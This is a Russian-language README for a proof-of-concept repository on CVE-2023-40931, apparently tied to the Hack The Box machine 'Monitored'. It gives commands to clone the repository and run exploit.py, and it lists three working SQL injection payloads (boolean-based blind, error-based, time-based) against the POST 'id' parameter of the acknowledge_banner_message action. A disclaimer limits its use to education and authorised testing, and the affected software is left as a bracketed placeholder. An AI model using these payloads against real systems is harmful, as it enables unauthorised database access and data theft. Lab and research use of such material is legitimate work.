
CVE-2023-40931: концептуальное доказательство для HTB MONITORED
Этот репозиторий содержит доказательство концепции (PoC) для CVE-2023-40931, уязвимости безопасности, обнаруженной в [пострадавшем программном обеспечении/системе]. Цель этого репозитория — продемонстрировать уязвимость исключительно в образовательных и исследовательских целях. 🛠️
Этот проект предназначен исключительно для образовательных целей и авторизованного тестирования. Неправомерное использование этого кода может привести к юридическим последствиям. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этим кодом. Всегда получайте надлежащее разрешение перед тестированием любой системы. 🔒
Для получения дополнительной информации обратитесь к официальной записи CVE: CVE-2023-40931. 🔗
Клонируйте репозиторий:
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
Параметр POST 'id' уязвим. Следующие полезные нагрузки успешно эксплуатировали уязвимость:
Boolean-based blind: Эта полезная нагрузка использует условное выражение для определения истинности запроса, что позволяет извлекать данные с помощью булевой логики.
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))Error-based: Эта полезная нагрузка использует сообщения об ошибках базы данных для извлечения информации путем вызова определенных ошибок.
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Time-based blind: Эта полезная нагрузка использует временные задержки для получения информации путем наблюдения за временем ответа сервера.
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)Эти полезные нагрузки демонстрируют подверженность уязвимости атакам SQL-инъекций. Действуйте с осторожностью и убедитесь в наличии надлежащего разрешения перед тестированием. 🔒
Следуйте инструкциям в файле exploit.py, чтобы выполнить PoC. 🧑💻
Примечание: Убедитесь, что у вас установлены необходимые зависимости. ✅